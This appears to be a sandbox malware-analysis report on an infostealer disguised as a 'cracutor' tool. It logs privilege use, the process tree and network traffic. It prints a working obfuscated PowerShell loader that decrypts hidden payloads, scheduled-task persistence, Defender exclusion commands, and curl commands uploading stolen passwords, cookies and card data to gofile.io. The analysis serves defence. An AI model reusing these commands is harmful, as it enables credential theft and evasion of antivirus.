N/A N/A N/A N/A

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe N/A
Key created \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1416 wrote to memory of 4224 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1416 wrote to memory of 4224 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4224 wrote to memory of 1252 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4224 wrote to memory of 1252 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4224 wrote to memory of 3088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4224 wrote to memory of 3088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 3088 wrote to memory of 4520 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3088 wrote to memory of 4520 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4520 wrote to memory of 928 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4520 wrote to memory of 928 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 928 wrote to memory of 4852 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe
PID 928 wrote to memory of 4852 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe
PID 928 wrote to memory of 4852 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe
PID 928 wrote to memory of 3836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 928 wrote to memory of 3836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 928 wrote to memory of 3668 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 928 wrote to memory of 3668 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 928 wrote to memory of 4480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 928 wrote to memory of 4480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 928 wrote to memory of 4240 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 928 wrote to memory of 4240 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 928 wrote to memory of 1392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\idcljz.exe
PID 928 wrote to memory of 1392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\idcljz.exe
PID 1392 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Users\Admin\AppData\Local\Temp\idcljz.exe
PID 1392 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Users\Admin\AppData\Local\Temp\idcljz.exe
PID 1476 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 1476 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 1476 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 1476 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 1544 wrote to memory of 4544 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1544 wrote to memory of 4544 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1476 wrote to memory of 628 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 1476 wrote to memory of 628 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 628 wrote to memory of 3836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 628 wrote to memory of 3836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1476 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 1476 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 4864 wrote to memory of 364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4864 wrote to memory of 364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1476 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 1476 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 1544 wrote to memory of 1988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1544 wrote to memory of 1988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1476 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 1476 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 2180 wrote to memory of 3904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2180 wrote to memory of 3904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1476 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 1476 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 1252 wrote to memory of 3668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1252 wrote to memory of 3668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1476 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 1476 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 2032 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2032 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1476 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 1476 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 4692 wrote to memory of 1888 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4692 wrote to memory of 1888 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1476 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 1476 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 2568 wrote to memory of 4160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2568 wrote to memory of 4160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1476 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bGqAVpTkbyYHaVSHHBPmXa3kZNv3H8sCS4IjMuFm+Ow='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BbGL3tLWlvORK8IKqoYaHg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SERoH=New-Object System.IO.MemoryStream(,$param_var); $uVeFk=New-Object System.IO.MemoryStream; $zXgAh=New-Object System.IO.Compression.GZipStream($SERoH, [IO.Compression.CompressionMode]::Decompress); $zXgAh.CopyTo($uVeFk); $zXgAh.Dispose(); $SERoH.Dispose(); $uVeFk.Dispose(); $uVeFk.ToArray();}function execute_function($param_var,$param2_var){ $REYPt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Drhro=$REYPt.EntryPoint; $Drhro.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat';$mZiIG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat').Split([Environment]::NewLine);foreach ($dACJS in $mZiIG) { if ($dACJS.StartsWith(':: ')) { $tZasG=$dACJS.Substring(3); break; }}$payloads_var=[string[]]$tZasG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_863_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_863.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_863.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_863.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bGqAVpTkbyYHaVSHHBPmXa3kZNv3H8sCS4IjMuFm+Ow='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BbGL3tLWlvORK8IKqoYaHg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SERoH=New-Object System.IO.MemoryStream(,$param_var); $uVeFk=New-Object System.IO.MemoryStream; $zXgAh=New-Object System.IO.Compression.GZipStream($SERoH, [IO.Compression.CompressionMode]::Decompress); $zXgAh.CopyTo($uVeFk); $zXgAh.Dispose(); $SERoH.Dispose(); $uVeFk.Dispose(); $uVeFk.ToArray();}function execute_function($param_var,$param2_var){ $REYPt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Drhro=$REYPt.EntryPoint; $Drhro.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_863.bat';$mZiIG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_863.bat').Split([Environment]::NewLine);foreach ($dACJS in $mZiIG) { if ($dACJS.StartsWith(':: ')) { $tZasG=$dACJS.Substring(3); break; }}$payloads_var=[string[]]$tZasG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe

"C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe'

C:\Users\Admin\AppData\Local\Temp\idcljz.exe

"C:\Users\Admin\AppData\Local\Temp\idcljz.exe"

C:\Users\Admin\AppData\Local\Temp\idcljz.exe

"C:\Users\Admin\AppData\Local\Temp\idcljz.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupGet.vsdm" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Desktop/BackupGet.vsdm" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupRestore.mpe" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Desktop/BackupRestore.mpe" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupSave.WTV" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Desktop/BackupSave.WTV" https://store9.gofile.io/uploadFile

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 scriptblox.com udp
US 104.26.4.195:443 scriptblox.com tcp
US 8.8.8.8:53 195.4.26.104.in-addr.arpa udp
US 8.8.8.8:53 publisher-misc.gl.at.ply.gg udp
US 147.185.221.17:58207 publisher-misc.gl.at.ply.gg tcp
US 8.8.8.8:53 17.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 147.185.221.17:58207 publisher-misc.gl.at.ply.gg tcp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
US 8.8.8.8:53 api.gofile.io udp
FR 51.38.43.18:443 api.gofile.io tcp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 8.8.8.8:53 18.43.38.51.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 8.8.8.8:53 store9.gofile.io udp
US 206.168.190.239:443 store9.gofile.io tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 239.190.168.206.in-addr.arpa udp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp
US 8.8.8.8:53 80.190.18.2.in-addr.arpa udp
US 206.168.190.239:443 store9.gofile.io tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp

Files

